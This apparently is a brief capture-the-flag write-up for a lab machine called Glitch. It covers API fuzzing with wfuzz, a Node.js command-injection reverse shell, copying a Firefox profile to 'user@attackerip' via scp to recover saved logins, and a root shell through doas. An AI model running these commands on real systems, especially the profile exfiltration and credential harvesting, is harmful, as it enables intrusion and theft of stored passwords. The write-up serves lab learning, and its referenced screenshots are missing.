nmap

 

 

homepage

 

 

On the home page, we are greeted by a glitch image with a not allowed title.

 

view-source:

 

 

This JavaScript function defines a function called getAccess, but this function doesn't seem to be called anywhere.

 

 

token we received from the /api/access page is encoded with base64.

 

 

Let's add the token from the f12 and refresh the page.

 

 

Meanwhile, gobuster found the /secret page.

 

 

Let's view the secret page while the scanning continues.

 

 

Nothing.

 

Yeah im mad

 

js.

 

 

/api/items:

 

 

If we try to POST instead GET to this we get the below message.

 

 

Let's see if we can find arguments for items to take

 

wfuzz -c -z file,objects.txt -X POST --hc 404,400 http://glitch.thm/api/items\?FUZZ\=test

 

okay we have cmd

 

https://medium.com/@sebnemK/node-js-rce-and-a-simple-reverse-shell-ctf-1b2de51c1a44

 

Using the method from here with our reverse shell urlencoded via burp we get a call back

 

 

noice

 

 

we got our firstflag

 

 

hmmh

 

 

Digging around I find a .firefox directory in our home. I copy this off and launch firefox to check for anything.

 

tar -cvf firefox.tgz .firefox

scp firefox.tgz user@attackerip:

then

 

tar xvf ~/firefox.tgz

firefox --profile .firefox/b5w4643p.default-release --allow-downgrade

 

When we launch firefox with the last command, we view the saved logins.

 

 

Now we can switch to v0id user.

 

 

User v0id does not have permission to run the sudo command.

 

 

When we put linpeas.sh on the machine and run it

 

[+] Checking doas.conf

permit v0id as root

Basically, doas is a kind of sudo. As we want to have a root shell, we need to execute a command like: sudo -u root /bin/bash.

 

doas -u root /bin/bash